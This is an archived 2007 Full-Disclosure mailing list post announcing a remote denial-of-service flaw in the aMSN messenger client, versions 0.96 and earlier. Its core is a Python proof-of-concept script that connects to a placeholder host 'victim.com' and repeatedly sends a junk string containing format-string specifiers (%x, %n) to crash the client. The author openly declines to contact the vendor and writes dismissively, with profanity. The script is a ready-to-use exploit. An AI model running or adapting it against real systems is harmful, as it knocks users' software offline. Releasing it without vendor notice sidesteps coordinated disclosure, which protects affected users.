lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20070421023527.GA41704@hack4>
Date: Sat, 21 Apr 2007 04:35:28 +0200
From: Levent Kayan <levent@...ehack.org>
To: full-disclosure@...ts.grok.org.uk
Subject: aMSN <= 0.96 remote DoS vulnerability

/*
 * bug: amsn remote DoS vulnerability
 * affected version: <= 0.96
 * site: http://amsn-project.net/
 * tested: amsn-0.96 on freebsd 6.2
 *
 * author: levent kayan
 * date: Tue Mar 27 16:04:51 CEST 2007
 * www.corehack.org
 */

/* Introduction */
amsn is a free open source MSN Messenger clone.

/* Technical details */
During fuzzing some instant-messaging applications, I found a basic bug in amsn.
I just sent some characters to that amsn port and noticed that it 
has reported an error and was killed. I didn't analyse the bug though. 
Maybe you're interested in doing so. :P
The following python script is enough to produce a DoS attack and kill 
the client:

---fuck off here---

import socket

HOST = 'victim.com'
PORT = 31337 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          °!"§$%&/()=?`#+#-.,;:_ÄÖÜäöü%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\³²¹³#²[{#³]²#\`~··')

---fuck off here---

I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit. 

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */

-- 
Name: Levent Kayan
E-Mail: levent@...ehack.org
GPG key: 
0xd6794965
Key fingerprint:
FD20 03C3 DD7F 51BB 224F  F11E 0855 23C8 D679 4965
Website:
http://www.corehack.org/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ